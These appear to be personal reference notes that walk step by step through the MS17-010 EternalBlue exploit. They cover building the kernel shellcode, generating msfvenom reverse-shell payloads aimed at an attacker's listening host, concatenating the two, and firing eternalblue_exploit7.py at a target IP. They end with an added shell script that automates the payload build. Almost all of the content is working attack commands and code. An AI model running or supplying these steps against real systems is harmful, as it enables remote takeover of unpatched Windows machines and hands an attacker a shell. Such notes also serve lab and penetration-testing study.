Backlink: reference-notes-readme


Source Code

Git Source: GitHub - worawit/MS17-010 (https://github.com/worawit/MS17-010)

Initial Preparation

First, clone the git repo.

git clone https://github.com/worawit/MS17-010.git

Next, move into the cloned repo, create a Python 2 virtual environment, and install impacket into it. The exploit scripts in this repo are Python 2 code, so a venv created with python3 is no use to them; recent impacket releases have dropped Python 2, so pin a version that still supports 2.7 (0.9.22 is used here as an example). This assumes a python2 interpreter with pip is available on the attacking machine.

cd MS17-010
python2 -m pip install virtualenv
python2 -m virtualenv venv
source venv/bin/activate
python2 -m pip install impacket==0.9.22

The first step in preparing the exploit itself is to assemble the kernel shellcode into a flat binary with nasm (-f bin). This is done twice, once per target architecture, and only needs doing once per checkout since the kernel shellcode does not depend on the target host.

nasm -f bin shellcode/eternalblue_kshellcode_x64.asm -o shellcode/sc_x64_kernel.bin
nasm -f bin shellcode/eternalblue_kshellcode_x86.asm -o shellcode/sc_x86_kernel.bin

Target Specific Preparation

To finish preparing the exploit, the following steps must be taken for each target, using the architecture that matches the target OS (x64 or x86).

First, generate a reverse shell payload for that architecture with msfvenom. LHOST and LPORT are the attacking machine and the port it listens on; a listener must be running there before the exploit is fired, or the shell will connect to nothing.

x64:

msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=192.168.49.160 --platform windows -a x64 --format raw -o /var/tmp/sc_x64_payload.bin

x86:

msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.49.160 --platform windows -a x86 --format raw -o /var/tmp/sc_x86_payload.bin

Then the kernel shellcode and the reverse shell payload need to be concatenated into a single file, kernel shellcode first: the kernel shellcode is what the exploit executes, and it hands control to the user-mode payload appended directly after it. Getting the order wrong, or appending an empty payload file because msfvenom failed, produces a file the exploit will happily send but that never yields a shell.

x64:

cat shellcode/sc_x64_kernel.bin /var/tmp/sc_x64_payload.bin > /var/tmp/sc_x64.bin

x86:

cat shellcode/sc_x86_kernel.bin /var/tmp/sc_x86_payload.bin > /var/tmp/sc_x86.bin

Finally, run the exploit script that matches the target OS with the shellcode file that matches its architecture. eternalblue_exploit7.py targets Windows 7 and Server 2008 R2; eternalblue_exploit8.py targets Windows 8 and Server 2012. The repo also ships checker.py, which is worth running against the target first: a failed EternalBlue attempt can blue-screen the host, so confirm it is actually unpatched before firing. If the first attempt does not land, eternalblue_exploit7.py accepts an optional third argument for the number of groom connections.

python2 eternalblue_exploit7.py 192.168.160.43 /var/tmp/sc_x86.bin
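The per-target steps above (msfvenom, concatenate, run) are easy to get subtly wrong, so here is an added shell helper that wraps them with the checks a practitioner would want. It is not part of the worawit/MS17-010 repo; it assumes the directory layout used in these notes (shellcode/sc_<arch>_kernel.bin already produced by nasm, payloads written under /var/tmp) and msfvenom on PATH. The function names combine_shellcode and build_for_target are this example's own, not anything in the repo.

```shell
#!/bin/sh
# Added example, not from the worawit/MS17-010 repo. Builds the combined
# kernel-shellcode + reverse-shell file for one target and refuses to produce
# a file that cannot work (empty inputs, wrong size, kernel stub not first).

# Byte size of a file, whitespace-trimmed so it works with BSD and GNU wc.
file_size() {
    wc -c < "$1" | tr -d ' '
}

# combine_shellcode KERNEL_BIN PAYLOAD_BIN OUT
# Writes KERNEL_BIN followed by PAYLOAD_BIN to OUT and verifies the result.
# Fails if either input is missing or empty (what a failed nasm or msfvenom
# run leaves behind), if the output size is not the sum of the inputs, or if
# OUT does not start with the kernel shellcode bytes.
combine_shellcode() {
    kernel="$1"; payload="$2"; out="$3"
    for f in "$kernel" "$payload"; do
        if [ ! -s "$f" ]; then
            echo "combine_shellcode: missing or empty input: $f" >&2
            return 1
        fi
    done
    cat "$kernel" "$payload" > "$out" || return 1
    ksize=$(file_size "$kernel")
    expected=$(( ksize + $(file_size "$payload") ))
    actual=$(file_size "$out")
    if [ "$actual" -ne "$expected" ]; then
        echo "combine_shellcode: size mismatch ($actual != $expected)" >&2
        return 1
    fi
    # The kernel stub is the entry point, so it must be the head of the file.
    if ! head -c "$ksize" "$out" | cmp -s - "$kernel"; then
        echo "combine_shellcode: kernel shellcode is not at offset 0" >&2
        return 1
    fi
    echo "$out: $actual bytes ($ksize kernel + $(( actual - ksize )) payload)"
}

# build_for_target ARCH LHOST LPORT
# Generates the msfvenom reverse shell for ARCH (x64 or x86), appends it to
# the nasm-built kernel shellcode and leaves /var/tmp/sc_<arch>.bin ready for
# the exploit script. Requires msfvenom; the checks below never reach it.
build_for_target() {
    arch="$1"; lhost="$2"; lport="$3"
    case "$arch" in
        x64) mod="windows/x64/shell_reverse_tcp" ;;
        x86) mod="windows/shell_reverse_tcp" ;;
        *) echo "build_for_target: arch must be x64 or x86, got '$arch'" >&2; return 1 ;;
    esac
    msfvenom -p "$mod" LHOST="$lhost" LPORT="$lport" --platform windows -a "$arch" \
        --format raw -o "/var/tmp/sc_${arch}_payload.bin" || return 1
    combine_shellcode "shellcode/sc_${arch}_kernel.bin" \
        "/var/tmp/sc_${arch}_payload.bin" "/var/tmp/sc_${arch}.bin"
}

# Usage from the repo root, with a listener already up on LHOST:LPORT:
#   . ./build_sc.sh   (assumed file name for this helper)
#   build_for_target x64 192.168.49.160 443 \
#     && python2 eternalblue_exploit7.py 192.168.160.43 /var/tmp/sc_x64.bin
```

combine_shellcode is kept separate from build_for_target so the concatenation can be checked on its own; the size and offset-0 checks are cheap and catch the two silent failure modes (empty payload, reversed order) before anything is sent at the target.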